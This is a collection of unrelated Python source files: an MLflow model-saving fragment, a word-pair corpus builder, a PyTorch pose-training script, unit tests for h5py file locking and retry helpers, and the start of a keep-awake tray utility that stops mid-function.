    if conda_env is None:
        if pip_requirements is None:
            default_reqs = get_default_pip_requirements()
            # To ensure `_load_pyfunc` can successfully load the model during the dependency
            # inference, `mlflow_model.save` must be called beforehand to save an MLmodel file.
            inferred_reqs = mlflow.models.infer_pip_requirements(
                path,
                FLAVOR_NAME,
                fallback=default_reqs,
            )
            default_reqs = sorted(set(inferred_reqs).union(default_reqs))
        else:
            default_reqs = None
        conda_env, pip_requirements, pip_constraints = _process_pip_requirements(
            default_reqs,
            pip_requirements,
            extra_pip_requirements,
        )
    else:
        conda_env, pip_requirements, pip_constraints = _process_conda_env(conda_env)

    with open(os.path.join(path, _CONDA_ENV_FILE_NAME), "w") as f:
        yaml.safe_dump(conda_env, stream=f, default_flow_style=False)

    # Save `constraints.txt` if necessary
    if pip_constraints:
        write_to(os.path.join(path, _CONSTRAINTS_FILE_NAME), "\n".join(pip_constraints))

    # Save `requirements.txt`
    write_to(os.path.join(path, _REQUIREMENTS_FILE_NAME), "\n".join(pip_requirements))

    return mlflow_model
loader_template = """
import importlib
import os
import sys
def load_pyfunc():
{update_path}return importlib.import_module('{main}')._load_pyfunc('{data_path}')
"""
|
makecorpus.py | import argparse
import os
import numpy as np
from multiprocessing import Process, Queue
from Queue import Empty
import ioutils
from representations.explicit import Explicit
from statutils.fastfreqdist import CachedFreqDist
SAMPLE_MAX = 1e9
def worker(proc_num, queue, out_dir, in_dir, count_dir, valid_words, num_words, min_count, sample=1e-5):
    # Python 2 worker process: repeatedly pulls a year off the shared queue and, for each
    # year, writes a shuffled (word, context) pair corpus plus a vocab file with counts.
    # `sample` downsamples frequent words/contexts (word2vec-style subsampling);
    # `min_count` filters the vocabulary via precomputed counts.
    while True:
        try:
            year = queue.get(block=False)
        except Empty:
            # Queue drained: this worker is done.
            break
        print proc_num, "Getting counts and matrix year", year
        embed = Explicit.load(in_dir + str(year) + ".bin", normalize=False)
        year_words = valid_words[year][:num_words]
        count_words = set(ioutils.words_above_count(count_dir, year, min_count))
        freq = CachedFreqDist(ioutils.load_pickle(count_dir + str(year) + "-counts.pkl"))
        # Restrict the embedding matrix to words that pass both the per-year word list
        # and the min-count filter.
        use_words = list(count_words.intersection(year_words))
        embed = embed.get_subembed(use_words, restrict_context=True)
        # Scale counts down so the total corpus size stays below SAMPLE_MAX tokens.
        sample_corr = min(SAMPLE_MAX / freq.N(), 1.0)
        print "Sample correction..", sample_corr
        embed.m = embed.m * sample_corr
        mat = embed.m.tocoo()
        print proc_num, "Outputing pairs for year", year
        with open(out_dir + str(year) + ".tmp.txt", "w") as fp:
            for i in xrange(len(mat.data)):
                if i % 10000 == 0:
                    print "Done ", i, "of", len(mat.data)
                word = embed.iw[mat.row[i]]
                context = embed.ic[mat.col[i]]
                if sample != 0:
                    # Subsampling: keep a pair with probability shrinking as either
                    # the word's or the context's relative frequency grows.
                    prop_keep = min(np.sqrt(sample / freq.freq(word)), 1.0)
                    prop_keep *= min(np.sqrt(sample / freq.freq(context)), 1.0)
                else:
                    prop_keep = 1.0
                word = word.encode("utf-8")
                context = context.encode("utf-8")
                line = word + " " + context + "\n"
                # Emit the pair once per (downsampled) co-occurrence count.
                for j in xrange(int(mat.data[i] * prop_keep)):
                    fp.write(line)
        mat = mat.tocsr()
        print proc_num, "Outputing vocab for year", year
        with open(out_dir + str(year) + ".vocab", "w") as fp:
            for word in year_words:
                if not word in count_words:
                    # Words filtered out by min_count still appear with a floor count of 1.
                    print >>fp, word.encode("utf-8"), 1
                else:
                    if word in embed.wi:
                        print >>fp, word.encode("utf-8"), int(mat[embed.wi[word], :].sum())
        # Echo then run the shell shuffle that produces the final randomized pair file.
        print "shuf " + out_dir + str(year) + ".tmp.txt" " > " + out_dir + str(year) + ".txt"
        os.system("shuf " + out_dir + str(year) + ".tmp.txt" + " > " + out_dir + str(year) + ".txt")
        os.remove(out_dir + str(year) + ".tmp.txt")
def run_parallel(num_procs, out_dir, in_dir, count_dir, years, words, num_words, min_count, sample):
    """Fan the per-year pair extraction out over `num_procs` worker processes.

    One task (year) per queue entry; workers drain the shared queue until empty.
    """
    work_queue = Queue()
    for year in years:
        work_queue.put(year)
    workers = []
    for proc_num in range(num_procs):
        workers.append(Process(
            target=worker,
            args=[proc_num, work_queue, out_dir, in_dir, count_dir,
                  words, num_words, min_count, sample],
        ))
    for proc in workers:
        proc.start()
    for proc in workers:
        proc.join()
if __name__ == '__main__':
    # CLI entry point: parse year range / sampling options and run the
    # pair-extraction workers in parallel.
    parser = argparse.ArgumentParser(description="Computes various frequency statistics.")
    parser.add_argument("out_dir")
    parser.add_argument("in_dir")
    parser.add_argument("count_dir")
    parser.add_argument("word_file", help="file maps from year to word list (the output of freqperyear)")
    parser.add_argument("--workers", type=int, default=10)
    parser.add_argument("--num-words", type=int, default=None)
    parser.add_argument("--start-year", type=int, help="start year (inclusive)", default=1800)
    parser.add_argument("--end-year", type=int, help="end year (inclusive)", default=2000)
    # Fixed copy-pasted help text: this flag is the step between years, not the end year.
    parser.add_argument("--year-inc", type=int, help="year increment (step between years)", default=1)
    parser.add_argument("--min-count", type=int, default=100)
    parser.add_argument("--sample", type=float, default=1e-5)
    args = parser.parse_args()
    # Inclusive year range stepped by --year-inc.
    years = range(args.start_year, args.end_year + 1, args.year_inc)
    words = ioutils.load_year_words(args.word_file, years)
    ioutils.mkdir(args.out_dir)
    run_parallel(args.workers, args.out_dir + "/", args.in_dir + "/", args.count_dir + "/", years, words, args.num_words, args.min_count, args.sample)
|
train_pose_only.py | import matplotlib
matplotlib.use('Agg')
import os
from os.path import join
import argparse
import torch
import numpy as np
import pickle
import sys
import datetime
sys.path.append('./utils')
from torch import optim
from torch import nn
from torch import multiprocessing
from torch.optim import lr_scheduler
from torch.autograd import Variable
from torch.utils.data import DataLoader, ConcatDataset
from utils.builders import SingleViewPoseBuilder
from utils.builder_utils import distance, Logger, ensure_folder, collate_fn, time_stamped
from utils.vocabulary import Vocabulary
from pose_tcn import define_model
from ipdb import set_trace
from sklearn.preprocessing import OneHotEncoder
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from torchvision import transforms
import torchvision.utils as vutils
import torchvision.models as models
from torchvision import datasets
from tensorboardX import SummaryWriter
import matplotlib.pyplot as plt
from utils.plot_utils import plot_mean
sys.path.append('/home/max/projects/gps-lfd')
sys.path.append('/home/msieb/projects/gps-lfd')
from config import Config_Isaac_Server as Config # Import approriate config
# Module-level configuration: everything below is read from the project Config
# object so one import switch (above) retargets the whole script.
conf = Config()
IMAGE_SIZE = (299, 299)  # input resolution fed to the network
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"]= "0, 1,2,3"
ITERATE_OVER_TRIPLETS = 3  # number of passes over each queued dataset per epoch
EXP_NAME = conf.EXP_NAME
#EXP_DIR = os.path.join('/home/msieb/data/tcn_data/experiments', EXP_NAME)
#EXP_DIR = os.path.join('/home/msieb/projects/data/tcn_data/experiments', EXP_NAME)
EXP_DIR = conf.EXP_DIR
MODEL_FOLDER = conf.MODEL_FOLDER
USE_CUDA = conf.USE_CUDA
NUM_VIEWS = conf.NUM_VIEWS
SAMPLE_SIZE = 100  # samples per built dataset (validation uses half)
builder = SingleViewPoseBuilder
# Tensorboard logs go to a fresh timestamped folder per run.
logdir = os.path.join('runs', MODEL_FOLDER, time_stamped())
print("logging to {}".format(logdir))
writer = SummaryWriter(logdir)
def get_args():
    """Parse command-line arguments for pose-only TCN training.

    Returns:
        argparse.Namespace with training schedule, data locations,
        checkpointing, and model hyper-parameters.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--start-epoch', type=int, default=0)
    parser.add_argument('--epochs', type=int, default=1000)
    parser.add_argument('--save-every', type=int, default=5)
    # Checkpoints go to a fresh timestamped folder per run.
    parser.add_argument('--model-folder', type=str, default=join(EXP_DIR, EXP_NAME,'trained_models', MODEL_FOLDER, time_stamped()))
    parser.add_argument('--load-model', type=str, required=False)
    # parser.add_argument('--train-directory', type=str, default='./data/multiview-pouring/train/')
    # parser.add_argument('--validation-directory', type=str, default='./data/multiview-pouring/val/')
    parser.add_argument('--train-directory', type=str, default=join(EXP_DIR, EXP_NAME, 'videos/train/'))
    parser.add_argument('--validation-directory', type=str, default=join(EXP_DIR, EXP_NAME, 'videos/valid/'))
    parser.add_argument('--minibatch-size', type=int, default=16)
    parser.add_argument('--margin', type=float, default=2.0)
    parser.add_argument('--model-name', type=str, default='tcn')
    parser.add_argument('--log-file', type=str, default='./out.log')
    parser.add_argument('--lr-start', type=float, default=0.01)
    parser.add_argument('--triplets-from-videos', type=int, default=5)
    parser.add_argument('--n-views', type=int, default=NUM_VIEWS)
    parser.add_argument('--alpha', type=float, default=0.001, help='weighing factor of language loss to triplet loss')
    # parser.add_argument('--model_path', type=str, default='models/' , help='path for saving trained models')
    # parser.add_argument('--crop_size', type=int, default=224 , help='size for randomly cropping images')
    # parser.add_argument('--vocab_path', type=str, default='data/vocab.pkl', help='path for vocabulary wrapper')
    # parser.add_argument('--image_dir', type=str, default='data/resized2014', help='directory for resized images')
    # parser.add_argument('--caption_path', type=str, default='data/annotations/captions_train2014.json', help='path for train annotation json file')
    # parser.add_argument('--log_step', type=int , default=10, help='step size for prining log info')
    # parser.add_argument('--save_step', type=int , default=1000, help='step size for saving trained models')
    # Model parameters
    parser.add_argument('--embed_size', type=int , default=32, help='dimension of word embedding vectors')
    parser.add_argument('--hidden_size', type=int , default=256, help='dimension of lstm hidden states')
    parser.add_argument('--num_layers', type=int , default=1, help='number of layers in lstm')
    # parser.add_argument('--num_epochs', type=int, default=5)
    # parser.add_argument('--batch_size', type=int, default=128)
    # parser.add_argument('--num_workers', type=int, default=2)
    # parser.add_argument('--learning_rate', type=float, default=0.001)
    return parser.parse_args()
# Parse CLI once at import time; `args` and `logger` are used module-wide.
args = get_args()
print(args)
logger = Logger(args.log_file)
def batch_size(epoch, max_size):
    """Batch-size schedule: doubles every 100 epochs, clamped to [2, max_size]."""
    doubling_steps = epoch // 100
    proposed = 2 ** doubling_steps
    if proposed < 2:
        proposed = 2
    return proposed if proposed <= max_size else max_size
# Build a fixed validation set once at startup (5 concatenated half-size sets),
# then drop the builder to free its resources.
validation_builder = builder(args.n_views, args.validation_directory, IMAGE_SIZE, args, sample_size=int(SAMPLE_SIZE/2.0))
validation_set = [validation_builder.build_set() for i in range(5)]
validation_set = ConcatDataset(validation_set)
del validation_builder
def loss_fn(tcn, minibatch):
    """Compute the MSE pose-regression loss for one minibatch.

    Args:
        tcn: model returning (embedding, unnormalized, pose_prediction).
        minibatch: (frames, poses) pair of tensors.

    Returns:
        Scalar MSE loss between predicted and ground-truth poses.
    """
    # Unpack unconditionally so the CPU path is defined too; the original only
    # bound these names when USE_CUDA was True (NameError otherwise).
    anchor_frames = minibatch[0]
    anchor_poses = minibatch[1]
    if USE_CUDA:
        anchor_frames = anchor_frames.cuda()
        anchor_poses = anchor_poses.cuda()
    # Only the pose head is trained here; the embedding outputs are unused.
    anchor_output, unnormalized, anchor_pose_pred = tcn(anchor_frames)
    # Removed corrupted debug line `print(anchor_pose_predprint(anchor_pose_pred))`,
    # which referenced the undefined name `anchor_pose_predprint` (NameError).
    loss = torch.nn.MSELoss()(anchor_pose_pred, anchor_poses)
    return loss
def validate(tcn, use_cuda, n_calls):
    """Run one pass over the module-level validation_set and log mean loss.

    Args:
        tcn: model under evaluation.
        use_cuda: pins DataLoader memory when True.
        n_calls: running tensorboard step counter; incremented per batch.

    Returns:
        (mean validation loss, updated n_calls).
    """
    # Run model on validation data and log results
    data_loader = DataLoader(
        validation_set,
        batch_size=16,
        shuffle=False,
        pin_memory=use_cuda,
    )
    losses = []
    for minibatch in data_loader:
        # frames = Variable(minibatch, require_grad=False)
        loss = loss_fn(tcn, minibatch)
        losses.append(loss.data.cpu().numpy())
        # One tensorboard point per validation batch (running mean so far).
        writer.add_scalar('data/valid_loss', np.mean(losses), n_calls)
        n_calls += 1
    loss = np.mean(losses)
    # NOTE(review): assumes the project's custom Logger.info accepts multiple
    # positional args (stdlib logging would treat the 2nd as a %-format arg) — verify.
    logger.info('val loss: ',loss)
    return loss, n_calls
def model_filename(model_name, epoch):
    """Build the checkpoint file name for a given model name and epoch."""
    return "{}-epoch-{}.pk".format(model_name, epoch)
def save_model(model, filename, model_folder):
    """Serialize model weights to model_folder/filename, creating the folder if needed."""
    ensure_folder(model_folder)
    torch.save(model.state_dict(), os.path.join(model_folder, filename))
def build_set(queue, triplet_builder, log):
    """Producer loop: repeatedly build 15 datasets, concatenate, and enqueue.

    Runs forever; `queue.put` blocks whenever the queue is full, so this
    naturally paces dataset construction to the consumer's training speed.
    """
    while True:
        built = [triplet_builder.build_set() for _ in range(15)]
        combined = ConcatDataset(built)
        # log.info('Created {0} triplets'.format(len(combined)))
        queue.put(combined)
def create_model(use_cuda):
    """Instantiate the pose TCN, optionally restoring weights from args.load_model.

    Args:
        use_cuda: move the model to GPU after (optionally) loading weights.
    """
    tcn = define_model(use_cuda)
    # tcn = PosNet()
    if args.load_model:
        model_path = os.path.join(
            args.model_folder,
            args.load_model
        )
        # map_location allows us to load models trained on cuda to cpu.
        tcn.load_state_dict(torch.load(model_path, map_location=lambda storage, loc: storage))
    if use_cuda:
        tcn = tcn.cuda()
    return tcn
def main():
    """Training loop: consume datasets from the builder process, train, validate, checkpoint."""
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    use_cuda = torch.cuda.is_available()
    tcn = create_model(use_cuda)
    tcn = torch.nn.DataParallel(tcn, device_ids=range(torch.cuda.device_count()))
    triplet_builder = builder(args.n_views, \
        args.train_directory, IMAGE_SIZE, args, sample_size=SAMPLE_SIZE)
    # Bounded queue (size 1): the daemon process builds the next dataset
    # in the background while this process trains on the current one.
    queue = multiprocessing.Queue(1)
    dataset_builder_process = multiprocessing.Process(target=build_set, args=(queue, triplet_builder, logger), daemon=True)
    dataset_builder_process.start()
    optimizer = optim.SGD(tcn.parameters(), lr=args.lr_start, momentum=0.9)
    # This will diminish the learning rate at the milestones.
    # 0.1, 0.01, 0.001
    learning_rate_scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=[200,500, 1000], gamma=0.1)
    criterion = nn.CrossEntropyLoss()  # NOTE(review): defined but never used below — verify.
    trn_losses_ = []
    val_losses_= []
    n_iter = 0
    n_valid_iter = 0
    for epoch in range(args.start_epoch, args.start_epoch + args.epochs):
        print("=" * 20)
        logger.info("Starting epoch: {0} learning rate: {1}".format(epoch,
            learning_rate_scheduler.get_lr()))
        learning_rate_scheduler.step()
        # Blocks until the builder process has produced the next dataset.
        dataset = queue.get()
        data_loader = DataLoader(
            dataset=dataset,
            batch_size=args.minibatch_size, # batch_size(epoch, args.max_minibatch_size),
            shuffle=True,
            pin_memory=use_cuda,
        )
        # Re-use each built dataset for several passes before fetching the next.
        for _ in range(0, ITERATE_OVER_TRIPLETS):
            losses = []
            for minibatch in data_loader:
                # frames = Variable(minibatch, require_grad=False)
                loss = loss_fn(tcn, minibatch)
                losses.append(loss.data.cpu().numpy())
                optimizer.zero_grad()
                loss.backward()
                optimizer.step()
                writer.add_scalar('data/train_loss', np.mean(losses), n_iter)
                n_iter += 1
        trn_losses_.append(np.mean(losses))
        # NOTE(review): assumes the custom Logger.info accepts multiple args — verify.
        logger.info('train loss: ', np.mean(losses))
        if epoch % 1 == 0:
            loss, n_valid_iter = validate(tcn, use_cuda, n_valid_iter)
            val_losses_.append(loss)
        if epoch % args.save_every == 0 and epoch != 0:
            logger.info('Saving model.')
            save_model(tcn, model_filename(args.model_name, epoch), args.model_folder)
        # Refresh loss plots every epoch.
        plot_mean(trn_losses_, args.model_folder, 'train_loss')
        plot_mean(val_losses_, args.model_folder, 'validation_loss')
        # plot_mean(train_acc_, args.model_folder, 'train_acc')
# Entry point: run training only when executed as a script.
if __name__ == '__main__':
    main()
|
test_h5py_utils.py | # coding: utf-8
# /*##########################################################################
# Copyright (C) 2016-2017 European Synchrotron Radiation Facility
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# ############################################################################*/
"""Tests for h5py utilities"""
__authors__ = ["W. de Nolf"]
__license__ = "MIT"
__date__ = "27/01/2020"
import unittest
import os
import sys
import time
import shutil
import tempfile
import threading
import multiprocessing
from contextlib import contextmanager
from .. import h5py_utils
from ...utils.retry import RetryError, RetryTimeoutError
IS_WINDOWS = sys.platform == "win32"
def _subprocess_context_main(queue, contextmgr, *args, **kw):
    """Child-process entry: enter `contextmgr`, signal readiness, then block forever.

    The parent kills this process when done, so on the success path the context
    is held until death. `queue.put(None)` is sent both on success and (just
    before re-raising) on failure, so the parent never hangs on `queue.get`.
    """
    try:
        with contextmgr(*args, **kw):
            queue.put(None)
            threading.Event().wait()
    except Exception:
        queue.put(None)
        raise
@contextmanager
def _subprocess_context(contextmgr, *args, **kw):
    """Hold `contextmgr(*args, **kw)` open in a subprocess while the caller's body runs.

    Blocks (up to `timeout`, default 10 s) until the child reports that it has
    entered the context, then yields; the child is killed on exit.
    """
    timeout = kw.pop("timeout", 10)
    queue = multiprocessing.Queue(maxsize=1)
    p = multiprocessing.Process(
        target=_subprocess_context_main, args=(queue, contextmgr) + args, kwargs=kw
    )
    p.start()
    try:
        # Wait for the child's "context entered" (or failure) signal.
        queue.get(timeout=timeout)
        yield
    finally:
        try:
            p.kill()
        except AttributeError:
            # Process.kill() is Python 3.7+; fall back to terminate().
            p.terminate()
        p.join(timeout)
@contextmanager
def _open_context(filename, **kw):
    """Open `filename` via h5py_utils.File; on creation ("w") write a 'check' flag dataset.

    The 'check' dataset is what the tests later read back to verify the file.
    """
    with h5py_utils.File(filename, **kw) as f:
        if kw.get("mode") == "w":
            f["check"] = True
            f.flush()
        yield f
def _cause_segfault():
    """Deliberately crash the interpreter with a segfault (simulates a hard failure).

    Used by the retry-in-subprocess tests, where the crashed worker is expected
    to be restarted. Never call this in-process.
    """
    import ctypes
    i = ctypes.c_char(b"a")
    j = ctypes.pointer(i)
    c = 0
    while True:
        # Write past the single-byte allocation until the OS kills the process.
        j[c] = b"a"
        c += 1
def _top_level_names_test(txtfilename, *args, **kw):
    """Wrapper around h5py_utils._top_level_names that fails its first `ncausefailure` calls.

    A counter persisted in `txtfilename` survives across subprocess retries;
    while below the threshold, calls alternate between raising RetryError (odd
    counts) and segfaulting (even counts), exercising both soft and hard
    failure paths of the retry machinery. stderr is silenced because the
    segfault noise is expected.
    """
    sys.stderr = open(os.devnull, "w")
    with open(txtfilename, mode="r") as f:
        failcounter = int(f.readline().strip())
    ncausefailure = kw.pop("ncausefailure")
    faildelay = kw.pop("faildelay")
    if failcounter < ncausefailure:
        time.sleep(faildelay)
        failcounter += 1
        # Persist the incremented counter before failing.
        with open(txtfilename, mode="w") as f:
            f.write(str(failcounter))
        if failcounter % 2:
            raise RetryError
        else:
            _cause_segfault()
    return h5py_utils._top_level_names(*args, **kw)
# Subprocess-retrying variant used by the tests below.
top_level_names_test = h5py_utils.retry_in_subprocess()(_top_level_names_test)
def subtests(test):
    """Decorator: repeat `test` once per option set produced by self._subtests().

    ``self._subtests()`` yields once per configuration (setting
    ``self._subtest_options`` as a side effect); each iteration runs the
    wrapped test inside ``self.subTest`` so failures are reported per config.
    """
    def wrapper(self):
        configurations = self._subtests()
        for _ in configurations:
            subtest_ctx = self.subTest(**self._subtest_options)
            with subtest_ctx:
                test(self)
    return wrapper
class TestH5pyUtils(unittest.TestCase):
    """End-to-end tests for h5py_utils: locking modes, SWMR, and retry helpers."""
    def setUp(self):
        # Private scratch directory; removed wholesale in tearDown.
        self.test_dir = tempfile.mkdtemp()
    def tearDown(self):
        shutil.rmtree(self.test_dir)
    def _subtests(self):
        """Yield once per option set; consumed by the @subtests decorator."""
        self._subtest_options = {"mode": "w"}
        self.filename_generator = self._filenames()
        yield
        self._subtest_options = {"mode": "w", "libver": "latest"}
        self.filename_generator = self._filenames()
        yield
    @property
    def _liber_allows_concurrent_access(self):
        # Only the older libver settings are expected to tolerate concurrent
        # access in these tests; "latest" is excluded.
        return self._subtest_options.get("libver") in [None, "earliest", "v18"]
    def _filenames(self):
        """Generate fresh .h5 paths, creating each file (with its 'check' dataset) first."""
        i = 1
        while True:
            filename = os.path.join(self.test_dir, "file{}.h5".format(i))
            with self._open_context(filename):
                pass
            yield filename
            i += 1
    def _new_filename(self):
        return next(self.filename_generator)
    @contextmanager
    def _open_context(self, filename, **kwargs):
        """Open `filename` with the current subtest options, overridden by kwargs.

        NOTE(review): `kw` aliases `self._subtest_options`, so the update
        persists into later calls within the subtest — verify this is intended.
        """
        kw = self._subtest_options
        kw.update(kwargs)
        with _open_context(filename, **kw) as f:
            yield f
    @contextmanager
    def _open_context_subprocess(self, filename, **kwargs):
        """Hold `filename` open in a separate process for the duration of the body."""
        kw = self._subtest_options
        kw.update(kwargs)
        with _subprocess_context(_open_context, filename, **kw):
            yield
    def _assert_hdf5_data(self, f):
        # The 'check' dataset is written on file creation by _open_context.
        self.assertTrue(f["check"][()])
    def _validate_hdf5_data(self, filename, swmr=False):
        with self._open_context(filename, mode="r") as f:
            self.assertEqual(f.swmr_mode, swmr)
            self._assert_hdf5_data(f)
    @subtests
    def test_modes_single_process(self):
        """Within one process: readers may coexist; reader excludes writer and vice versa."""
        orig = os.environ.get("HDF5_USE_FILE_LOCKING")
        filename1 = self._new_filename()
        self.assertEqual(orig, os.environ.get("HDF5_USE_FILE_LOCKING"))
        filename2 = self._new_filename()
        self.assertEqual(orig, os.environ.get("HDF5_USE_FILE_LOCKING"))
        with self._open_context(filename1, mode="r"):
            with self._open_context(filename2, mode="r"):
                pass
            # While a file is held open for reading, writing must fail.
            for mode in ["w", "a"]:
                with self.assertRaises(RuntimeError):
                    with self._open_context(filename2, mode=mode):
                        pass
        self.assertEqual(orig, os.environ.get("HDF5_USE_FILE_LOCKING"))
        with self._open_context(filename1, mode="a"):
            for mode in ["w", "a"]:
                with self._open_context(filename2, mode=mode):
                    pass
            # While a file is held open for appending, reading must fail.
            with self.assertRaises(RuntimeError):
                with self._open_context(filename2, mode="r"):
                    pass
        self.assertEqual(orig, os.environ.get("HDF5_USE_FILE_LOCKING"))
    @subtests
    def test_modes_multi_process(self):
        if not self._liber_allows_concurrent_access:
            # A concurrent reader with HDF5_USE_FILE_LOCKING=FALSE
            # no longer works with HDF5 >=1.10 (you get an exception
            # when trying to open the file)
            return
        filename = self._new_filename()
        # File open by truncating writer
        with self._open_context_subprocess(filename, mode="w"):
            with self._open_context(filename, mode="r") as f:
                self._assert_hdf5_data(f)
            if IS_WINDOWS:
                with self._open_context(filename, mode="a") as f:
                    self._assert_hdf5_data(f)
            else:
                with self.assertRaises(OSError):
                    with self._open_context(filename, mode="a") as f:
                        pass
        self._validate_hdf5_data(filename)
        # File open by appending writer
        with self._open_context_subprocess(filename, mode="a"):
            with self._open_context(filename, mode="r") as f:
                self._assert_hdf5_data(f)
            if IS_WINDOWS:
                with self._open_context(filename, mode="a") as f:
                    self._assert_hdf5_data(f)
            else:
                with self.assertRaises(OSError):
                    with self._open_context(filename, mode="a") as f:
                        pass
        self._validate_hdf5_data(filename)
        # File open by reader
        with self._open_context_subprocess(filename, mode="r"):
            with self._open_context(filename, mode="r") as f:
                self._assert_hdf5_data(f)
            with self._open_context(filename, mode="a") as f:
                pass
        self._validate_hdf5_data(filename)
        # File open by locking reader
        with _subprocess_context(
            _open_context, filename, mode="r", enable_file_locking=True
        ):
            with self._open_context(filename, mode="r") as f:
                self._assert_hdf5_data(f)
            if IS_WINDOWS:
                with self._open_context(filename, mode="a") as f:
                    self._assert_hdf5_data(f)
            else:
                with self.assertRaises(OSError):
                    with self._open_context(filename, mode="a") as f:
                        pass
        self._validate_hdf5_data(filename)
    @subtests
    @unittest.skipIf(not h5py_utils.HAS_SWMR, "SWMR not supported")
    def test_modes_multi_process_swmr(self):
        filename = self._new_filename()
        # SWMR requires libver="latest".
        with self._open_context(filename, mode="w", libver="latest") as f:
            pass
        # File open by SWMR writer
        with self._open_context_subprocess(filename, mode="a", swmr=True):
            with self._open_context(filename, mode="r") as f:
                assert f.swmr_mode
                self._assert_hdf5_data(f)
            with self.assertRaises(OSError):
                with self._open_context(filename, mode="a") as f:
                    pass
        self._validate_hdf5_data(filename, swmr=True)
    @subtests
    def test_retry_defaults(self):
        filename = self._new_filename()
        # Default include_only filters out 'check'; include_only=None keeps it.
        names = h5py_utils.top_level_names(filename)
        self.assertEqual(names, [])
        names = h5py_utils.safe_top_level_names(filename)
        self.assertEqual(names, [])
        names = h5py_utils.top_level_names(filename, include_only=None)
        self.assertEqual(names, ["check"])
        names = h5py_utils.safe_top_level_names(filename, include_only=None)
        self.assertEqual(names, ["check"])
        # Failing validation without retry_invalid yields None instead of the item.
        with h5py_utils.open_item(filename, "/check", validate=lambda x: False) as item:
            self.assertEqual(item, None)
        with h5py_utils.open_item(filename, "/check", validate=None) as item:
            self.assertTrue(item[()])
        # retry_invalid=True keeps retrying a failing validator until timeout.
        with self.assertRaises(RetryTimeoutError):
            with h5py_utils.open_item(
                filename,
                "/check",
                retry_timeout=0.1,
                retry_invalid=True,
                validate=lambda x: False,
            ) as item:
                pass
        ncall = 0
        def validate(item):
            # Fails once with RetryError, then succeeds.
            nonlocal ncall
            if ncall >= 1:
                return True
            else:
                ncall += 1
                raise RetryError
        with h5py_utils.open_item(
            filename, "/check", validate=validate, retry_timeout=1, retry_invalid=True
        ) as item:
            self.assertTrue(item[()])
    @subtests
    def test_retry_custom(self):
        """retry_contextmanager: succeeds within a generous timeout, times out under a tight one."""
        filename = self._new_filename()
        ncausefailure = 3
        faildelay = 0.1
        sufficient_timeout = ncausefailure * (faildelay + 10)
        insufficient_timeout = ncausefailure * faildelay * 0.5
        @h5py_utils.retry_contextmanager()
        def open_item(filename, name):
            # Fails the first `ncausefailure` attempts, then yields the item.
            nonlocal failcounter
            if failcounter < ncausefailure:
                time.sleep(faildelay)
                failcounter += 1
                raise RetryError
            with h5py_utils.File(filename) as h5file:
                yield h5file[name]
        failcounter = 0
        kw = {"retry_timeout": sufficient_timeout}
        with open_item(filename, "/check", **kw) as item:
            self.assertTrue(item[()])
        failcounter = 0
        kw = {"retry_timeout": insufficient_timeout}
        with self.assertRaises(RetryTimeoutError):
            with open_item(filename, "/check", **kw) as item:
                pass
    @subtests
    def test_retry_in_subprocess(self):
        """retry_in_subprocess survives RetryErrors and segfaults until the failure budget is spent."""
        filename = self._new_filename()
        # Failure counter lives in a text file so it survives subprocess restarts.
        txtfilename = os.path.join(self.test_dir, "failcounter.txt")
        ncausefailure = 3
        faildelay = 0.1
        sufficient_timeout = ncausefailure * (faildelay + 10)
        insufficient_timeout = ncausefailure * faildelay * 0.5
        kw = {
            "retry_timeout": sufficient_timeout,
            "include_only": None,
            "ncausefailure": ncausefailure,
            "faildelay": faildelay,
        }
        with open(txtfilename, mode="w") as f:
            f.write("0")
        names = top_level_names_test(txtfilename, filename, **kw)
        self.assertEqual(names, ["check"])
        kw = {
            "retry_timeout": insufficient_timeout,
            "include_only": None,
            "ncausefailure": ncausefailure,
            "faildelay": faildelay,
        }
        with open(txtfilename, mode="w") as f:
            f.write("0")
        with self.assertRaises(RetryTimeoutError):
            top_level_names_test(txtfilename, filename, **kw)
|
awake.pyw | """awake: a small utility to keep a windows machine from going asleep"""
import threading
import time
import logging
from pyautogui import press
from pystray import MenuItem as item
import pystray
from PIL import Image
import tkinter as tk
# Enable/disable debug mode: when True, debug-level messages go to the console.
DEBUGMODE = False
if DEBUGMODE:
    logging.basicConfig(format='%(message)s', level=logging.DEBUG)
    logging.debug("DEBUG MODE ACTIVE")
def second_thread():
    """Background loop that taps Scroll Lock periodically to keep the machine awake.

    Runs until main() sets the `do_run` attribute on this thread to False
    (default True via getattr, so it runs immediately when started).
    """
    logging.debug("2nd Thread Start")
    # threading.current_thread() replaces the camelCase alias currentThread(),
    # which is deprecated since Python 3.10. Behavior is identical.
    while getattr(threading.current_thread(), "do_run", True):
        for _ in range(0, 2): #always do it twice, so scrollock returns to original state
            press('scrolllock')
            time.sleep(0.4) ##400ms
    logging.debug("2nd Thread Stop")
def main():
    """Main GUI thread: build the window, start the key-press thread, run the tray icon."""
    #Create the Window
    window = tk.Tk()
    window.wm_attributes("-topmost", 1) #always on top
    window.resizable(0, 0) #no maximise button
    window.title("Stay Awake, Don't Sleep!")
    window.iconbitmap("./icon/ZZZZ.ico")
    window.geometry("512x256")
    #Add an Image
    img = tk.PhotoImage(file="image/ZZZZ.png")
    img_label = tk.Label(window, image=img)
    img_label.pack()
    #Launch Second (Scroll Lock Button Pressing) Thread
    thread = threading.Thread(target=second_thread)
    thread.start()
    #Functions used for tray icon code
    def quit_window(icon, item):
        # Stop the tray icon and tear the window down entirely.
